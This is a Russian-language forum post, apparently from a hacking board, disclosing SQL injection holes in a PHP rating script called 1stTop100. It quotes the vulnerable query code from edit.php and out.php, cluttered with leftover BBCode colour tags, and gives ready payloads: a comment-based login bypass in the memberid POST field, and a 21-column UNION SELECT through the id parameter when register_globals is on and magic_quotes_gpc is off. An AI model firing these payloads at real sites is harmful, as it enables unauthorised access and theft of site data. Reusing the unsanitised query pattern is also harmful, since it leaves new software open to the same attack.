15.08.2010, 20:02
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
[SIZE="3"][COLOR="Green"]1stTop100
->edit.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"submit"[/COLOR][COLOR="#007700"]] AND ![/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"edit"[/COLOR][COLOR="#007700"]]){
[/COLOR][COLOR="#0000BB"]$pass[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"pass"[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM top_[/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#DD0000"]WHERE memberid = '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"id"[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"' AND password = '[/COLOR][COLOR="#0000BB"]$pass[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]) or die([/COLOR][COLOR="#DD0000"]"Невозможно подключиться к mysql"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_num_rows[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]);
...
...
...
[/COLOR][/COLOR]
Expl:
Код:
Code:
POST
memberid=1' --
->out.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM top_[/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#DD0000"]WHERE memberid = '[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#DD0000"]"Невозможно подключиться к MySQL"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$date[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"dmY"[/COLOR][COLOR="#007700"]);
while([/COLOR][COLOR="#0000BB"]$object[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_object[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"])){
[/COLOR][COLOR="#0000BB"]$today[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$object[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]hitstoday[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$today[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]" | "[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$today[/COLOR][COLOR="#007700"]);
...
...
...
[/COLOR][/COLOR]
При register_globals = ON и magic_quotes_gpc = OFF
Expl:
Код:
Code:
$_GET['id'] = 1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
|
|
|